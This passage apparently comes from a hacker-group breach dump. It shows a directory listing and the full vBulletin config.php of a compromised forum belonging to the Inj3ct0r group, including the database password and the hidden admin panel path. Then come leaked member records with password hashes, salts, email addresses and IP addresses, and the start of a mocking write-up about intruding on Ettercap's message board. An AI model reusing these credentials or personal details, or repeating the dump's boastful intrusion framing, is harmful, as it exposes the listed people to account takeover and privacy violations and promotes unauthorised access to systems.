  1844. -r-xr-xr-x  1 n3tw0rkTeRr0r15M inj3ct0r  10850 Jun 29 15:30 groupsubscription.php
  1845. -r-xr-xr-x  1 n3tw0rkTeRr0r15M inj3ct0r   9375 Jun 29 15:30 image.php
  1846. dr-xr-xr-x  5 n3tw0rkTeRr0r15M inj3ct0r   4096 Jun 27 19:42 images
  1847. dr-xr-xr-x  6 n3tw0rkTeRr0r15M inj3ct0r  12288 Jun  6 14:01 includes
  1848. -rwxrwxrwx  1 n3tw0rkTeRr0r15M inj3ct0r  19444 Sep 26 12:27 index.php
  1849. dr-xr-xr-x  6 n3tw0rkTeRr0r15M inj3ct0r   4096 Jun 22 16:28 infernoshout
  1850. -r-xr-xr-x  1 n3tw0rkTeRr0r15M inj3ct0r  11103 Jun 29 15:30 infernoshout.php
  1851. -r-xr-xr-x  1 n3tw0rkTeRr0r15M inj3ct0r  44256 Jun 29 15:30 infraction.php
  1852. -r-xr-xr-x  1 n3tw0rkTeRr0r15M inj3ct0r 183249 Jun 29 15:31 inlinemod.php
  1853. -r-xr-xr-x  1 n3tw0rkTeRr0r15M inj3ct0r  10670 Jun 29 15:31 joinrequests.php
  1854. -r-xr-xr-x  1 n3tw0rkTeRr0r15M inj3ct0r  11052 Jun 29 15:31 login.php
  1855. -r-xr-xr-x  1 n3tw0rkTeRr0r15M inj3ct0r  17392 Jun 29 15:31 member.php
  1856. -r-xr-xr-x  1 n3tw0rkTeRr0r15M inj3ct0r  16259 Jun 29 15:31 member_inlinemod.php
  1857. -r-xr-xr-x  1 n3tw0rkTeRr0r15M inj3ct0r  36229 Jun 29 15:31 memberlist.php
  1858. -r-xr-xr-x  1 n3tw0rkTeRr0r15M inj3ct0r  24194 Jun 29 15:31 misc.php
  1859. dr-xr-xr-x  2 n3tw0rkTeRr0r15M inj3ct0r   4096 Jun  6 14:00 modcp
  1860. -r-xr-xr-x  1 n3tw0rkTeRr0r15M inj3ct0r  63652 Jun 29 15:32 moderation.php
  1861. -r-xr-xr-x  1 n3tw0rkTeRr0r15M inj3ct0r   7084 Jun 29 15:32 moderator.php
  1862. -r-xr-xr-x  1 n3tw0rkTeRr0r15M inj3ct0r   1889 Jun 29 15:32 myip.php
  1863. -r-xr-xr-x  1 n3tw0rkTeRr0r15M inj3ct0r  18804 Jun 29 15:32 newattachment.php
  1864. -r-xr-xr-x  1 n3tw0rkTeRr0r15M inj3ct0r  37429 Jun 29 15:33 newreply.php
  1865. -r-xr-xr-x  1 n3tw0rkTeRr0r15M inj3ct0r  19239 Jun 29 15:33 newthread.php
  1866. -r-xr-xr-x  1 n3tw0rkTeRr0r15M inj3ct0r  19932 Jun 29 15:33 online.php
  1867. -r-xr-xr-x  1 n3tw0rkTeRr0r15M inj3ct0r   8024 Jun 29 15:33 payment_gateway.php
  1868. -r-xr-xr-x  1 n3tw0rkTeRr0r15M inj3ct0r  12238 Jun 29 15:33 payments.php
  1869. -r-xr-xr-x  1 n3tw0rkTeRr0r15M inj3ct0r   8217 Jun 29 15:34 picture.php
  1870. -r-xr-xr-x  1 n3tw0rkTeRr0r15M inj3ct0r  22368 Jun 29 15:33 picture_inlinemod.php
  1871. -r-xr-xr-x  1 n3tw0rkTeRr0r15M inj3ct0r  25635 Jun 29 15:34 picturecomment.php
  1872. -r-xr-xr-x  1 n3tw0rkTeRr0r15M inj3ct0r  27740 Jun 29 15:34 poll.php
  1873. -r-xr-xr-x  1 n3tw0rkTeRr0r15M inj3ct0r   9840 Jun 29 15:34 posthistory.php
  1874. -r-xr-xr-x  1 n3tw0rkTeRr0r15M inj3ct0r  74696 Jun 29 15:34 postings.php
  1875. -r-xr-xr-x  1 n3tw0rkTeRr0r15M inj3ct0r   6921 Jun 29 15:34 printthread.php
  1876. -r-xr-xr-x  1 n3tw0rkTeRr0r15M inj3ct0r  71068 Jun 29 15:34 private.php
  1877. -r-xr-xr-x  1 n3tw0rkTeRr0r15M inj3ct0r 152656 Jun 29 15:35 profile.php
  1878. dr-xr-xr-x  3 n3tw0rkTeRr0r15M inj3ct0r   4096 Jun 22 22:02 r00tpan3l123lol
  1879. -r-xr-xr-x  1 n3tw0rkTeRr0r15M inj3ct0r  40079 Jun 29 15:35 register.php
  1880. -r-xr-xr-x  1 n3tw0rkTeRr0r15M inj3ct0r   6015 Jun 29 15:35 report.php
  1881. -r-xr-xr-x  1 n3tw0rkTeRr0r15M inj3ct0r  14047 Jun 29 15:35 reputation.php
  1882. -r-xr-xr-x  1 n3tw0rkTeRr0r15M inj3ct0r 125045 Jun 29 15:35 search.php
  1883. -r-xr-xr-x  1 n3tw0rkTeRr0r15M inj3ct0r  21274 Jun 29 15:35 sendmessage.php
  1884. -r-xr-xr-x  1 n3tw0rkTeRr0r15M inj3ct0r  10337 Jun 29 15:36 showgroups.php
  1885. -r-xr-xr-x  1 n3tw0rkTeRr0r15M inj3ct0r  12716 Jun 29 15:36 showpost.php
  1886. -r-xr-xr-x  1 n3tw0rkTeRr0r15M inj3ct0r  73853 Jun 29 15:36 showthread.php
  1887. dr-xr-xr-x  2 n3tw0rkTeRr0r15M inj3ct0r   4096 Jun  6 14:00 signaturepics
  1888. dr-xr-xr-x  2 n3tw0rkTeRr0r15M inj3ct0r   4096 Jun 22 15:42 smilies
  1889. -r-xr-xr-x  1 n3tw0rkTeRr0r15M inj3ct0r  17014 Jun 29 15:36 spy.php
  1890. -r-xr-xr-x  1 n3tw0rkTeRr0r15M inj3ct0r  33204 Jun 29 15:36 subscription.php
  1891. -r-xr-xr-x  1 n3tw0rkTeRr0r15M inj3ct0r  13693 Jun 29 15:36 tags.php
  1892. dr-xr-xr-x 16 n3tw0rkTeRr0r15M inj3ct0r   4096 Jul 22 12:03 tech_blue
  1893. dr-xr-xr-x 16 n3tw0rkTeRr0r15M inj3ct0r   4096 Jul 19 22:04 tech_dark
  1894. dr-xr-xr-x 16 n3tw0rkTeRr0r15M inj3ct0r   4096 Jul 19 22:04 tech_white
  1895. -r-xr-xr-x  1 n3tw0rkTeRr0r15M inj3ct0r   9020 Jun 29 15:36 threadrate.php
  1896. -r-xr-xr-x  1 n3tw0rkTeRr0r15M inj3ct0r  12743 Jun 29 15:36 threadtag.php
  1897. -r-xr-xr-x  1 n3tw0rkTeRr0r15M inj3ct0r  34836 Jun 29 15:37 usercp.php
  1898. -r-xr-xr-x  1 n3tw0rkTeRr0r15M inj3ct0r  19423 Jun 29 15:37 usernote.php
  1899. -r-xr-xr-x  1 n3tw0rkTeRr0r15M inj3ct0r  29903 Jun 29 15:37 validator.php
  1900. -r-xr-xr-x  1 n3tw0rkTeRr0r15M inj3ct0r  27705 Jun 29 15:37 visitormessage.php
  1901.  
  1902. $ cat includes/config.php
  1903. <?php
  1904. /*======================================================================*\
  1905. || #################################################################### ||
  1906. || # vBulletin 3.8.5
  1907. || # ---------------------------------------------------------------- # ||
  1908. || # All PHP code in this file is ©2000-2010 Jelsoft Enterprises Ltd. # ||
  1909. || # This file may not be redistributed in whole or significant part. # ||
  1910. || # ---------------- VBULLETIN IS NOT FREE SOFTWARE ---------------- # ||
  1911. || # http://www.vbulletin.com | http://www.vbulletin.com/license.html # ||
  1912. || #################################################################### ||
  1913. \*======================================================================*/
  1914.  
  1915. /*-------------------------------------------------------*\
  1916. | ****** NOTE REGARDING THE VARIABLES IN THIS FILE ****** |
  1917. +---------------------------------------------------------+
  1918. | If you get any errors while attempting to connect to    |
  1919. | MySQL, you will need to email your webhost because we   |
  1920. | cannot tell you the correct values for the variables    |
  1921. | in this file.                                           |
  1922. \*-------------------------------------------------------*/
  1923.  
  1924.    //   ****** DATABASE TYPE ******
  1925.    //   This is the type of the database server on which your vBulletin database will be located.
  1926.    //   Valid options are mysql and mysqli, for slave support add _slave.  Try to use mysqli if you are using PHP 5 and MySQL 4.1+
  1927.    // for slave options just append _slave to your preferred database type.
  1928. config['Database']['dbtype'] = 'mysql';
  1929.  
  1930.    //   ****** DATABASE NAME ******
  1931.    //   This is the name of the database where your vBulletin will be located.
  1932.    //   This must be created by your webhost.
  1933. config['Database']['dbname'] = 'n3tw0rkTeRr0r15M';
  1934.  
  1935.    //   ****** TABLE PREFIX ******
  1936.    //   Prefix that your vBulletin tables have in the database.
  1937. config['Database']['tableprefix'] = '';
  1938.  
  1939.    //   ****** TECHNICAL EMAIL ADDRESS ******
  1940.    //   If any database errors occur, they will be emailed to the address specified here.
  1941.    //   Leave this blank to not send any emails when there is a database error.
  1942. config['Database']['technicalemail'] = 'dbmaster@example.com';
  1943.  
  1944.    //   ****** FORCE EMPTY SQL MODE ******
  1945.    // New versions of MySQL (4.1+) have introduced some behaviors that are
  1946.    // incompatible with vBulletin. Setting this value to "true" disables those
  1947.    // behaviors. You only need to modify this value if vBulletin recommends it.
  1948. config['Database']['force_sql_mode'] = false;
  1949.  
  1950.  
  1951.  
  1952.    //   ****** MASTER DATABASE SERVER NAME AND PORT ******
  1953.    //   This is the hostname or IP address and port of the database server.
  1954.    //   If you are unsure of what to put here, leave the default values.
  1955. config['MasterServer']['servername'] = 'localhost';
  1956. config['MasterServer']['port'] = 3306;
  1957.  
  1958.    //   ****** MASTER DATABASE USERNAME & PASSWORD ******
  1959.    //   This is the username and password you use to access MySQL.
  1960.    //   These must be obtained through your webhost.
  1961. config['MasterServer']['username'] = 'n3tw0rkTeRr0r15M';
  1962. config['MasterServer']['password'] = '+)(_3xpl0!t3R_goG)teror15M(_}';
  1963.  
  1964.    //   ****** MASTER DATABASE PERSISTENT CONNECTIONS ******
  1965.    //   This option allows you to turn persistent connections to MySQL on or off.
  1966.    //   The difference in performance is negligible for all but the largest boards.
  1967.    //   If you are unsure what this should be, leave it off. (0 = off; 1 = on)
  1968. config['MasterServer']['usepconnect'] = 0;
  1969.  
  1970.  
  1971.  
  1972.    //   ****** SLAVE DATABASE CONFIGURATION ******
  1973.    //   If you have multiple database backends, this is the information for your slave
  1974.    //   server. If you are not 100% sure you need to fill in this information,
  1975.    //   do not change any of the values here.
  1976. config['SlaveServer']['servername'] = '';
  1977. config['SlaveServer']['port'] = 3306;
  1978. config['SlaveServer']['username'] = '';
  1979. config['SlaveServer']['password'] = '';
  1980. config['SlaveServer']['usepconnect'] = 0;
  1981.  
  1982.  
  1983.  
  1984.    //   ****** PATH TO ADMIN & MODERATOR CONTROL PANELS ******
  1985.    //   This setting allows you to change the name of the folders that the admin and
  1986.    //   moderator control panels reside in. You may wish to do this for security purposes.
  1987.    //   Please note that if you change the name of the directory here, you will still need
  1988.    //   to manually change the name of the directory on the server.
  1989. config['Misc']['admincpdir'] = 'r00tpan3l123lol';
  1990. config['Misc']['modcpdir'] = 'modcp';
  1991.  
  1992.    //   Prefix that all vBulletin cookies will have
  1993.    //   Keep this short and only use numbers and letters, i.e. 1-9 and a-Z
  1994. config['Misc']['cookieprefix'] = 'bb';
  1995.  
  1996.    //   ******** FULL PATH TO FORUMS DIRECTORY ******
  1997.    //   On a few systems it may be necessary to input the full path to your forums directory
  1998.    //   for vBulletin to function normally. You can ignore this setting unless vBulletin
  1999.    //   tells you to fill this in. Do not include a trailing slash!
  2000.    //   Example Unix:
  2001.    //     config['Misc']['forumpath'] = '/home/users/public_html/forums';
  2002.    //   Example Win32:
  2003.    //     config['Misc']['forumpath'] = 'c:\program files\apache group\apache\htdocs\vb3';
  2004. config['Misc']['forumpath'] = '';
  2005.  
  2006.    //   ****** COOKIE SECURITY HASH ******
  2007.    //   This option allows you to encode cookie.
  2008.    //   You may use any latin and/or any other alphanumeric symbols.
  2009.    //   Leave this blank to use the default value.
  2010.    //   Note: if you change this all users will be logout.
  2011. config['Misc']['cookie_security_hash'] = '';
  2012.  
  2013.  
  2014.  
  2015.    //   ****** USERS WITH ADMIN LOG VIEWING PERMISSIONS ******
  2016.    //   The users specified here will be allowed to view the admin log in the control panel.
  2017.    //   Users must be specified by *ID number* here. To obtain a user's ID number,
  2018.    //   view their profile via the control panel. If this is a new installation, leave
  2019.    //   the first user created will have a user ID of 1. Seperate each userid with a comma.
  2020. config['SpecialUsers']['canviewadminlog'] = '1,237';
  2021.  
  2022.    //   ****** USERS WITH ADMIN LOG PRUNING PERMISSIONS ******
  2023.    //   The users specified here will be allowed to remove ("prune") entries from the admin
  2024.    //   log. See the above entry for more information on the format.
  2025. config['SpecialUsers']['canpruneadminlog'] = '1';
  2026.  
  2027.    //   ****** USERS WITH QUERY RUNNING PERMISSIONS ******
  2028.    //   The users specified here will be allowed to run queries from the control panel.
  2029.    //   See the above entries for more information on the format.
  2030.    //   Please note that the ability to run queries is quite powerful. You may wish
  2031.    //   to remove all user IDs from this list for security reasons.
  2032. config['SpecialUsers']['canrunqueries'] = '';
  2033.  
  2034.    //   ****** UNDELETABLE / UNALTERABLE USERS ******
  2035.    //   The users specified here will not be deletable or alterable from the control panel by any users.
  2036.    //   To specify more than one user, separate userids with commas.
  2037. config['SpecialUsers']['undeletableusers'] = '1';
  2038.  
  2039.    //   ****** SUPER ADMINISTRATORS ******
  2040.    //   The users specified below will have permission to access the administrator permissions
  2041.    //   page, which controls the permissions of other administrators
  2042. config['SpecialUsers']['superadministrators'] = '1';
  2043.  
  2044.    // ****** DATASTORE CACHE CONFIGURATION *****
  2045.    // Here you can configure different methods for caching datastore items.
  2046.    // vB_Datastore_Filecache  - to use includes/datastore/datastore_cache.php
  2047.    // vB_Datastore_APC - to use APC
  2048.    // vB_Datastore_XCache - to use XCache
  2049.    // vB_Datastore_Memcached - to use a Memcache server, more configuration below
  2050. // config['Datastore']['class'] = 'vB_Datastore_Filecache';
  2051.  
  2052.    // ******** DATASTORE PREFIX ******
  2053.    // If you are using a PHP Caching system (APC, XCache, eAccelerator) with more
  2054.    // than one set of forums installed on your host, you *may* need to use a prefix
  2055.    // so that they do not try to use the same variable within the cache.
  2056.    // This works in a similar manner to the database table prefix.
  2057. // config['Datastore']['prefix'] = '';
  2058.  
  2059.    // It is also necessary to specify the hostname or IP address and the port the server is listening on
  2060. /*
  2061. config['Datastore']['class'] = 'vB_Datastore_Memcached';
  2062. i = 0;
  2063. // First Server
  2064. i++;
  2065. config['Misc']['memcacheserver'][i]          = '127.0.0.1';
  2066. config['Misc']['memcacheport'][i]            = 11211;
  2067. config['Misc']['memcachepersistent'][i]      = true;
  2068. config['Misc']['memcacheweight'][i]          = 1;
  2069. config['Misc']['memcachetimeout'][i]         = 1;
  2070. config['Misc']['memcacheretry_interval'][i] = 15;
  2071. */
  2072.  
  2073. // ****** The following options are only needed in special cases ******
  2074.  
  2075.    //   ****** MySQLI OPTIONS *****
  2076.    // When using MySQL 4.1+, MySQLi should be used to connect to the database.
  2077.    // If you need to set the default connection charset because your database
  2078.    // is using a charset other than latin1, you can set the charset here.
  2079.    // If you don't set the charset to be the same as your database, you
  2080.    // may receive collation errors.  Ignore this setting unless you
  2081.    // are sure you need to use it.
  2082. // config['Mysqli']['charset'] = 'utf8';
  2083.  
  2084.    //   Optionally, PHP can be instructed to set connection parameters by reading from the
  2085.    //   file named in 'ini_file'. Please use a full path to the file.
  2086.    //   Example:
  2087.    //   config['Mysqli']['ini_file'] = 'c:\program files\MySQL\MySQL Server 4.1\my.ini';
  2088. config['Mysqli']['ini_file'] = '';
  2089.  
  2090. // Image Processing Options
  2091.    // Images that exceed either dimension below will not be resized by vBulletin. If you need to resize larger images, alter these settings.
  2092. config['Misc']['maxwidth'] = 2592;
  2093. config['Misc']['maxheight'] = 1944;
  2094.  
  2095. /*======================================================================*\
  2096. || ####################################################################
  2097. || # CVS: RCSfile - Revision: 28757
  2098. || ####################################################################
  2099. \*======================================================================*/
  2100.  
  2101.  
  2102.                                        /;    ;\                        
  2103.                                    __  \\____//                        
  2104.                                   /{_\_/   `'\____                    
  2105.                                   \___   (o)  (o  }   I AM AN INJ3CT0R
  2106.        _____________________________/          :--' /     CHICK, MOO  
  2107.    ,-,'`@@@@@@@@       @@@@@@         \_    `__\                      
  2108.   ;:(  @@@@@@@@@        @@@             \___(o'o)                      
  2109.   :: )  @@@@          @@@@@@        ,'@@(  `===='                      
  2110.   :: : @@@@@:          @@@@         `@@@:                              
  2111.   :: \  @@@@@:       @@@@@@@)    (  '@@@'                              
  2112.   ;; /\      /`,    @@@@@@@@@\   :@@@@@)                              
  2113.   ::/  )    {_----------------:  :~`,~~;                              
  2114.  ;;'`; :   )                  :  / `; ;                                
  2115. ;;;; : :   ;                  :  ;  ; :                                
  2116. `'`' / :  :                   :  :  : :                                
  2117.     )_ \__;      ";"          :_ ;  \_\       `,','                    
  2118.     :__\  \    * `,'*         \  \  :  \   *  8`;'*  *                
  2119.         `^'     \ :/           `^'  `-^-'   \v/ :  \/   BA            
  2120.  
  2121.  
  2122.  
  2123. Sid3^effects:661567a4c0a71a50fdcf4b2c550775d4:}uP>ob0J%H?EB_&*9z(q7:v%w)j,yx:shell_c99@yahoo.com:122.164.235.10:
  2124. L0rd CrusAd3r:2685fd80293b5b6cf1a2d2f488b2db72:{pmYzcy%QfgFy0ftJ?_>"F|L42vtcK:lord.v5111@gmail.com:59.92.22.151:
  2125. Inj3ct0r:170aebb9d6ba17f411e90b931421f703:.Q:eI}"c";[e`?'o6N/al|}RE;-mNU:admin@admin.com::
  2126. eidelweiss:cd0c84191f189462696ec6de04a5455b:KNU@c;qRh;j$Qc9Vp+r=:$<Pi/rr]T:g1xsystem@windowslive.com:125.167.199.36:
  2127. Sn!pEr.S!Te:c5e3f6e791415b187d3d4e2b3d925f77:H?OV^L*.MS@Q03f9uQ_g]D|@vTE0_v:sniper-site@hotmail.com:188.52.23.241:1111117
  2128. SONiC:4470e1dc2c49e82f9fca1a3dfc390b1a:4gJ4eT\Rj|L}O/%6(@,&05#:ofzi}#:sonicdefence@gmail.com:115.242.246.84:
  2129. Napst3r:d73666e5df3d0eb8a714d5a82178e5d7:#}bjIPUanj,[v2yiQVg~oZhv&<g;`k:n4pst3rr@ymail.com:94.183.216.10:3124741
  2130. Th3 RDX:b76091a46d7539eacf00cb149f12f963:0;a?QrF0KSHPX"t_q\?.[N&(@mK|K[:th3rdx@gmail.com:78.107.237.16:
  2131. agix:81c472aa99efd24319045f02d5f16be6:e_AcAV4sgTlR6rPEk)-&aexwXLqGpo:flogaultier@hotmail.com:82.228.79.212:laconte
  2132. gunslinger_:1b804cc6bf8cbd19c7276d694cf538a6:N_}fYU<sB676{aGTg([1*`p<$yztnG:yudha.gunslinger@gmail.com:182.0.91.89:
  2133. indoushka:3d277315b290351a56ec18e4aee1a988:VZIKmamSDtKwy&KnJU)uT`viut}c,$:indoushka@hotmail.com:41.107.107.238:123456789
  2134. SeeMe:f3dfe545ae017c7fcb8c7df9884255f1:s~.$o798QL'>}mFtE1ZHRD(LW/Uvhj:jimsalimg@msn.com:41.252.59.225:
  2135. KnocKout:64f26f1e22bba61290603bc8f514a56d:`gXoY<&>G~m02Z)EMJK{*oRa\>8aAr:mmertocan@gmail.com:88.242.249.163:
  2136. anT!-Tr0J4n:b6f1b2d02236cb9bc983482c5789999c:`dFJd>n&KjhTtynf#L05jSQ%h'=jsl:rnoom_h@yahoo.com:41.191.28.15:
  2137.  
  2138. ,_._._._._._._._|____________________________________________________
  2139. |_|_|_|_|_|_|_|_|___________________________________________________/
  2140.    ~ ettercap ~ !                                                    
  2141.                                                                      
  2142. You would think that the authors of Ettercap, one of the most  popular
  2143. whitehat  pentesting  tools,  would  know  the  basics  of   security.
  2144. Apparently they don't, or they just  don't  give  a  shit  about  what
  2145. happens to their users.                                              
  2146.                                                                      
  2147. So, why is their website so  insecure?  Ettercap's  message  board  is
  2148. hosted at Sourceforge, so they share a server with thousands of  other
  2149. customers. Every single customer  is  able  to  execute  commands  and
  2150. access the other project directories. Pretty stupid, eh? You only need
  2151. to find one hole in one hosted site and you can access ALL the project
  2152. databases. Of course  that  isn't  ALoR's  fault,  it's  Sourceforge's
  2153. fault. Regardless, people who care about security and  data  integrity
  2154. wouldn't use such a shitty provider,  would  they?  To  be  fair,  the
  2155. Ettercap project is dead. Most of the admins have been inactive for  a
  2156. few years now, but that  is  no  excuse  for  such  a  security  mess.
  2157. Especially since the server was compromised some five years ago.      
  2158.